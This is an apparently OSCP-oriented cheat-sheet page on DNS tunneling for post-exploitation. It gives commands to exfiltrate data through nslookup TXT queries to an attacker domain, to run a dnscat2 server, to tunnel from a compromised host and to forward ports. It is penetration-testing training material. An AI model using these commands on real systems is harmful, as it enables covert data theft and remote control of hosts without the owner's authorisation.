> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/post-exploitation/dns-tunneling.md).

# DNS Tunneling

Data can be exfiltrated using DNS records and the protocol itself

Create a txt record on compromised server and exfil line by line

```
nslookup -type=txt exfiltrated.data.dogs.corp
```

#### dnscat2

Spin up dnscat2 server

```
dnscat2-server feline.corp
```

Drop binary on compromised host and create tunnel

```
./dnscat feline.corp
```

<figure><img src="/files/tK9k1IwMFYrr2GQp95BZ" alt=""><figcaption></figcaption></figure>

View sessions

```
windows
```

Interact with a session

```
window -i 1
```

Set up a port forward

```
listen 0.0.0.0:1338 172.16.192.217:4646
```
